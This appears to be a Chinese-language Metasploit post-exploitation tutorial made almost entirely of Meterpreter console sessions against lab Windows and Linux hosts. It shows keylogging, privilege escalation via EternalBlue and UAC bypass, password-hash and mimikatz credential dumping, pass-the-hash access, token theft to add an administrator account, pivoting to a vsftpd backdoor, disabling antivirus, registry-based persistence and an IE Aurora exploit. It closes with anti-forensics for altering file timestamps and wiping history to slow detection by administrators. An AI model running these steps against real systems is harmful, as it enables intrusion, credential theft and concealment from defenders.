meterpreter > psProcess List============ PID   PPID  NameArch  Session  User  Path…  exe 1184  1132  explorer.exex64   1  WIN-2VEIIKHJ7M8小鈴鐺   C:WindowsExplorer.EXEmeterpreter > migrate 1184 遷移到1184進程中[*] Migrating from 2496 to 1184... [*] Migration completed successfully.  meterpreter > run post/windows/capture/keylog_recorder[*] Executing module against WIN-2VEIIKHJ7M8[*] Starting the keylog recorder...[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt [*] Recording keystrokes... ^C[*] User interrupt.  [*] Shutting down keylog recorder. Please wait...# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txtKeystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8小鈴鐺 started at 2022-06-24 13:22:19 +0800tgest<^H><^H><^H><^H><^H><^H>testI amFy<^H><^H>GuXiangwww.3Keylog Recorder exited at 2022-06-24 13:24:03 +0800

提權

最基礎的提權

meterpreter >getuidServer username:E86004903967404Administratormeterpreter >getsystem...got systemvia technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter >getuidServer username:NT AUTHORITYSYSTEM

利用漏洞提權

Windows 7

meterpreter >backgroundmsf6exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue[*] No payloadconfigured, defaulting to windows/x64/meterpreter/reverse_tcpmsf6exploit(windows/smb/ms17_010_eternalblue) > useexploit/windows/smb/ms17_010_eternalblue[*] Usingconfigured payload windows/x64/meterpreter/reverse_tcpmsf6exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1SESSION =>1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168rhost =>192.168.0.168msf6exploit(windows/smb/ms17_010_eternalblue) > exploit

繞過UAC提權

Windows 7

用戶賬戶控制(User Account Control,簡寫作UAC)是微軟公司在其Windows Vista及更高版本操作系統中采用的一種控制機制。其原理是通知用戶是否對應用程序使用硬盤驅動器和系統文件授權,以達到幫助阻止惡意程序(有時也稱為“惡意軟件”)損壞系統的效果。

meterpreter >backgroundmsf6exploit(multi/handler) > use exploit/windows/local/bypassuac[*] No payloadconfigured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/local/bypassuac)> set session 2session => 2msf6exploit(windows/local/bypassuac) > exploit[*] Startedreverse TCP handler on 192.168.0.150:4444[*] UAC isEnabled, checking level...[+] UAC is setto Default[+] BypassUACcan bypass this setting, continuing...…[*] Meterpretersession 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-1915:45:06 +0800meterpreter >getuidServer username:WIN-2VEIIKHJ7M8小鈴鐺meterpreter >getsystem...got systemvia technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter >getuidServer username:NT AUTHORITYSYSTEMmeterpreter >

觸發UAC機制

Windows 10

meterpreter> background[*]Backgrounding session 1...msf6exploit(multi/handler) > use exploit/windows/local/ask[*] No payloadconfigured, defaulting to windows/meterpreter/reverse_tcpmsf6exploit(windows/local/ask) > set session 1session => 1msf6exploit(windows/local/ask) > set filename payload.exefilename =>payload.exemsf6 exploit(windows/local/ask)> exploit[*] Startedreverse TCP handler on 192.168.0.150:4444[*] UAC isEnabled, checking level...[*] The userwill be prompted, wait for them to click 'Ok'[*] Uploadingpayload.exe - 73802 bytes to the filesystem...[*] ExecutingCommand![*] Sendingstage (175686 bytes) to 192.168.0.106[*] Meterpretersession 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-2711:39:52 +0800meterpreter> getsystem...got system via technique 1 (NamedPipe Impersonation (In Memory/Admin)).

獲取用戶名密碼

提取密碼哈希值

Windows 10

meterpreter > getsystemmeterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exemeterpreter > migrate 736[*] Migrating from 5724 to 736...[*] Migration completed successfully.meterpreter > load kiwiLoading extension kiwi...'  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/Success. meterpreter > kiwi_cmd sekurlsa::logonpasswords…SID   : S-1-5-21-2772671008-4265266102-715737954-1001       msv :              [00000003] Primary        * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * NTLM : 4f151ab2d4afdef65f9664b0422ad83f       tspkg :             wdigest :              * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * Password : (null)       kerberos :              * Username : xianggu625@126.com        * Domain   : MicrosoftAccount        * Password : (null)       ssp :             credman :             cloudap :      …

重新進入

msf6 exploit(windows/local/ask) > use exploit/multi/handler[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 443msf6 exploit(multi/handler) set rhost 192.168.0.106rhost => 192.168.0.106msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83fSMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4msf6 exploit(multi/handler) exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.106[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800meterpreter >

Windows7

meterpreter > getsystem[-] Already running as SYSTEMmeterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::小鈴鐺:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 512  396   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:Windowssystem32lsass.exemeterpreter > migrate 512[*] Migrating from 1672 to 512...[*] Migration completed successfully.meterpreter > load kiwiLoading extension kiwi...  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > http://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/Success.meterpreter > kiwi_cmd sekurlsa::logonpasswordsAuthentication Id : 0 ; 81005 (00000000:00013c6d)Session   : Interactive from 1User Name :   : WIN-2VEIIKHJ7M8        * LM   : 44efce164ab921caaad3b435b51404ee        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f       tspkg :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       wdigest :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       kerberos :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       ssp :             credman :              [00000000]???  PPgN  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ##  / ##   > https://blog.gentilkiwi.com/mimikatz '## v ##'   Vincent LE TOUX ( vincent.letoux@gmail.com )  '#####'> https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(powershell) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 81005 (00000000:00013c6d)Session   : Interactive from 1User Name : ??Domain: WIN-2VEIIKHJ7M8Logon Server  : WIN-2VEIIKHJ7M8Logon Time: 2022/6/27 14:58:54SID   : S-1-5-21-2305812133-3308626755-1024735854-1000       msv :              [00000003] Primary        * Username : ??        * Domain   : WIN-2VEIIKHJ7M8        * LM   : 44efce164ab921caaad3b435b51404ee        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f       tspkg :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       wdigest :              * Username : (null)        * Domain   : WIN-2VEIIKHJ7M8        * Password : 123456       kerberos :              * Username : (null)        *

重新進入

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800meterpreter >

令牌假冒添加用戶

meterpreter > ps | grep lsassFiltering on 'lsass'Process List============ PID  PPID  Name   Arch  Session  User Path ---  ----  ----   ----  -------  ---- ---- 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exe meterpreter > steal_token 736Stolen token with username: NT AUTHORITYSYSTEMmeterpreter > use incognitoLoading extension incognito...Success.meterpreter > list_tokens -uDelegation Tokens Available========================================DESKTOP-9A8VFKBxiangNT AUTHORITYLOCAL SERVICENT AUTHORITYNETWORK SERVICENT AUTHORITYSYSTEMNT SERVICEReportServerWindow ManagerDWM-1Impersonation Tokens Available========================================Font Driver HostUMFD-0Font Driver HostUMFD-1NT AUTHORITYANONYMOUS LOGONNT SERVICEMSSQLFDLauncherNT SERVICEMSSQLSERVERNT SERVICEMSSQLServerOLAPServicemeterpreter > impersonate_token "NT AUTHORITY\SYSTEM"[+] Delegation token available[+] Successfully impersonated user NT AUTHORITYSYSTEMmeterpreter > add_user tom 123456 -h 192.168.0.106[*] Attempting to add user tom to host 192.168.0.106[+] Successfully added usermeterpreter > add_group_user "administrators" tom -h 192.168.0.106…

跳板

目標為安裝vsftpd V2.3.4的Linux機器

Windows10->vsftpd V2.3.4的Linux機器

meterpreter >run get_local_subnets[!] Meterpreterscripts are deprecated. Try post/multi/manage/autoroute.[!] Example: runpost/multi/manage/autoroute OPTION=value [...]Local subnet:192.168.0.0/255.255.255.0Local subnet:192.168.5.0/255.255.255.0Local subnet:192.168.81.0/255.255.255.0meterpreter >background[*]Backgrounding session 3...msf6exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3[*] Route addedmsf6exploit(windows/local/ask) > route printIPv4 ActiveRouting Table========================= Subnet             Netmask            Gateway ------             -------            ------- 192.168.0.0        255.255.255.0      Session 3[*] There arecurrently no IPv6 routes defined.msf6exploit(windows/smb/ms17_010_eternalblue) > useexploit/unix/ftp/vsftpd_234_backdoor[*] No payloadconfigured, defaulting to cmd/unix/interactmsf6exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload =>cmd/unix/interactmsf6exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171rhost =>192.168.0.171sf6exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*]192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)[*]192.168.0.171:21 - USER: 331 Please specify the password.[+]192.168.0.171:21 - Backdoor service has been spawned, handling...[+]192.168.0.171:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Commandshell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 viasession 3) at 2022-07-19 17:00:32 +0800

使用Meterpreter運行腳本

運行VNC

Windows 10

meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:UsersxiangAppDataLocalTempeiISyc.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.0.150:4545...[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.到windows里面運行C:UsersxiangAppDataLocalTempeiISyc.exe會看到效果meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensionsNo authentication neededAuthentication successfulDesktop name "desktop-9a8vfkb"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Same machine: preferring raw encoding

Windows 7

meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:WindowsTEMPYNpMWsIZ.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.0.150:4545...meterpreter > Connected to RFB server, using protocol version 3.8Enabling TightVNC protocol extensionsNo authentication neededAuthentication successful[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800Desktop name "win-2veiikhj7m8"VNC server default format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Using default colormap which is TrueColor.  Pixel format:  32 bits per pixel.  Least significant byte first in each pixel.  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0Same machine: preferring raw encoding

遷移進程

meterpreter > run post/windows/manage/migrate[*] Running module against DESKTOP-9A8VFKB[*] Current server process: payload.exe (8716)[*] Spawning notepad.exe process to migrate into[*] Spoofing PPID 0[*] Migrating into 9944[+] Successfully migrated into process 9944

關閉殺毒軟件

meterpreter > run killav[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.[!] Example: run post/windows/manage/killav OPTION=value [...][*] Killing Antivirus services on the target...

獲取系統密碼哈希值

meterpreter > run hashdump[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...][*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*] Obtaining the user list and keys...[*] Decrypting user keys...[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …

所以改用

meterpreter > run post/windows/gather/smart_hashdump[*] Running module against DESKTOP-9A8VFKB[*] Hashes will be saved to the database if one is connected.[+] Hashes will be saved in loot in JtR password file format to:[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt[*] Dumping password hashes...[*] Running as SYSTEM extracting hashes from registry[*]        Obtaining the boot key...[*]        Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...[*]        Obtaining the user list and keys...[*]        Decrypting user keys...[*]        Dumping password hints...[*]        No users with password hints on this system[*]        Dumping password hashes...[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]        xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[+]        tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

或

meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::小鈴鐺:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

獲取目標機上流量

目標機必須支持:rpcapd service,在Windows上安裝winpcap即可

meterpreter > run post/windows/manage/rpcapd_start[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)[*] Setting rpcapd as 'auto' service[*] Enabling rpcapd.exe in Windows Firewall[*] Installing rpcap in PASSIVE mode (local port: 2002)[+] Rpcapd started successfully: C:Program Files (x86)winpcaprpcapd.exe -d -p 2002 -n

獲取系統信息

Windows 10

meterpreter >run scraper[*] New session on 192.168.0.106:7216...[*] Gathering basic system information...[-] Failed to run command net view[-] Error: Rex::TimeoutError Operation timed out.[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:UsersxiangAppDataLocalTempWLNUaYcc.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[-] Failed to run command reg.exe export HKLM C:UsersxiangAppDataLocalTempIymTDekJ.reg[-] Error: Rex::TimeoutError Operation timed out.[*]  Downloading HKLM (C:UsersxiangAppDataLocalTempIymTDekJ.reg)[*] Exception: Rex::Post::

Windows 7

meterpreter > run scraper[*] New session on 192.168.0.158:445...[*] Gathering basic system information...[*] Dumping password hashes...[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:WindowsTEMPsbOwIdlG.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[*]  Downloading HKLM (C:WindowsTEMPpQzbPtfD.reg)[*]  Cleaning HKLM[*]  Exporting HKCC[*]  Downloading HKCC (C:WindowsTEMPxdgVency.reg)[*]  Cleaning HKCC[*]  Exporting HKCR[*]  Downloading HKCR (C:WindowsTEMPaWoyKSRV.reg)[*]  Cleaning HKCR[*]  Exporting HKU[*]  Downloading HKU (C:WindowsTEMPabgTRNGl.reg)[*]  Cleaning HKU[*] Completed processing on 192.168.0.158:445...

Windows 2003

meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > run scraper[*] New session on 192.168.0.169:1438...[*] Gathering basic system information...[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.[*] Obtaining the entire registry...[*]  Exporting HKCU[*]  Downloading HKCU (C:DOCUME~1ADMINI~1LOCALS~1TempIatUIdPZ.reg)[*]  Cleaning HKCU[*]  Exporting HKLM[*]  Downloading HKLM (C:DOCUME~1ADMINI~1LOCALS~1TempJcjKKLfF.reg)[*]  Cleaning HKLM[*]  Exporting HKCC[*]  Downloading HKCC (C:DOCUME~1ADMINI~1LOCALS~1TempgLgAxVWq.reg)[*]  Cleaning HKCC[*]  Exporting HKCR[*]  Downloading HKCR (C:DOCUME~1ADMINI~1LOCALS~1TempKDJAycay.reg)[*]  Cleaning HKCR[*]  Exporting HKU[*]  Downloading HKU (C:DOCUME~1ADMINI~1LOCALS~1TempzebuwlsT.reg)[*]  Cleaning HKU[*] Completed processing on 192.168.0.169:1438...

控制持久化

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106

啟動meterpreter:-X

50秒后重連:-i 50

使用端口8888:-p 8888

目的IP 192.168.0.106:-r 192.168.0.106

meterpreter > run persistence -X -i 50 -p 8888 -r 192.168.0.106[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.[!] Example: run exploit/windows/local/persistence OPTION=value [...][*] Running Persistence script[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-2VEIIKHJ7M8_20220628.5835/WIN-2VEIIKHJ7M8_20220628.5835.rc[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888[*] Persistent agent script is 99674 bytes long[+] Persistent script written to C:WindowsTEMPQQxsjpmT.vbs[*] Executing script C:WindowsTEMPQQxsjpmT.vbs[+] Agent executed with PID 2580[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunMdedIPrvpFMB

Windows7成功

將命令行shell升級為Metewrpreter

msf6> use exploit/windows/smb/ms17_010_eternalblue[*] Using configured payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -z

-z:攻擊成功,在后臺,不進入

[*] Started reverse TCP handler on 192.168.0.150:4444[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)[+] 192.168.0.158:445 - The target is vulnerable.[*] 192.168.0.158:445 - Connecting to target for exploitation.[+] 192.168.0.158:445 - Connection established for exploitation.[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet[*] 192.168.0.158:445 - Starting non-paged pool grooming[+] 192.168.0.158:445 - Sending SMBv2 buffers[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.158:445 - Sending final SMBv2 buffers.[*] 192.168.0.158:445 - Sending last fragment of exploit packet![*] 192.168.0.158:445 - Receiving response from exploit packet[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.158:445 - Sending egg to corrupted connection.[*] 192.168.0.158:445 - Triggering free of corrupted buffer.[*] Sending stage (200774 bytes) to 192.168.0.158[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.158:49321) at 2022-06-28 14:13:48 +0800[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[*] Session 3 created in the background.msf6 exploit(windows/smb/ms17_010_eternalblue) > session -u 3[-] Unknown command: sessionmsf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -u 3[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3][*] Upgrading session ID: 3[*] Starting exploit/multi/handler[*] Started reverse TCP handler on 192.168.0.150:4433msf6 exploit(windows/smb/ms17_010_eternalblue) >[*] Sending stage (200774 bytes) to 192.168.0.158[*] Meterpreter session 4 opened (192.168.0.150:4433 -> 192.168.0.158:49325) at 2022-06-28 14:14:39 +0800[*] Stopping exploit/multi/handlermsf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 4[*] Starting interaction with 4...*/meterpreter >meterpreter > irb[*] Starting IRB shell...[*] You are in the "client" (session) objectirb: warn: can't alias kill from irb_kill.>> fs.dir.pwd=> "C:\Windows\system32"

對IE瀏覽器激光漏洞進行滲透利用

Windows XP

msf6 > use exploit/windows/browser/ms10_002_aurora[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > show optionsModule options (exploit/windows/browser/ms10_002_aurora):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.   SRVPORT  8080             yes       The local port to listen on.   SSL      false            no        Negotiate SSL for incoming connections   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                   no        The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Automaticmsf6 exploit(windows/browser/ms10_002_aurora) > set SRVPORT 80SRVPORT => 80msf6 exploit(windows/browser/ms10_002_aurora) > set URIPATH /URIPATH => /msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443lport => 443msf6 exploit(windows/browser/ms10_002_aurora) > exploit -z[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:443[*] Using URL: http://192.168.0.150/[*] Server started.msf6 exploit(windows/browser/ms10_002_aurora) > [*] 192.168.0.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption

抹殺記錄

當我們達到了目的之后,有時候只是為了黑入網站掛黑頁,炫耀一下;或者在網站留下一個后門,作為肉雞,沒事的時候上去溜達溜達;亦或者掛入挖礦木馬;但是大家千萬不要干這些事,這些都是違法的!

我這里只是教大家在滲透進去之后如何清除我們留下的一部分痕跡,并不能完全清除,完全清除入侵痕跡是不可能的!主要是增加管理員發現入侵者的時間成本和人力成本。只要管理員想查,無論你怎么清除,還是能查到的。

最主要還是要以隱藏自身身份為主,最好的手段是在滲透前掛上代理,然后在滲透后痕跡清除。

Windows

PowerShell修改時間命令

$(DATE) 表示當前日期和時間;

(Get-Date) 同(DATE),表示當前日期和時間;

$(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和時間;

$(Get-Item abc.txt) 表示獲取文件的句柄;

$(Get-Item abc.txt).creationtime 獲取文件創建時間

$(Get-Item abc.txt).lastaccesstime 獲取文件最后訪問時間

$(Get-Item abc.txt).lastwritetime 獲取文件修改時間

# 設置文件test.txt的時間為當前時間

(Get-Item abc.txt).creationtime=(DATE)

(Get-Item abc.txt).lastaccesstime=(DATE)

(Get-Item abc.txt).lastwritetime=(DATE)

# 設置文件abc.txt的時間為指定的某個時間

(Get-Item abc.txt).creationtime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastaccesstime=(Get-Date "11/04/2019 20:42:23")

(Get-Item abc.txt).lastwritetime=(Get-Date "11/04/2019 20:42:23")

其他記錄

清理“運行”中的歷史記錄

• 開始菜單中的“運行”菜單里保存著我們通過它運行過的程序及所打開的文件路徑與名稱。
• 進入注冊表編輯器,找到HKEY_CURRENT_ USERSortwareMicrosoftWindowsCurrentversionEsploierRunmru分支。從中選擇不需要的或不想要別人看到的記錄刪除即可。

清理“查找”中的歷史記錄

• (1)、清理查找計算機的歷史記錄
• 進入注冊表編輯器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5647分支,選擇不需要的或是不想讓別人看到的記錄刪除即可。
• (2)清理查找文件的歷史記錄

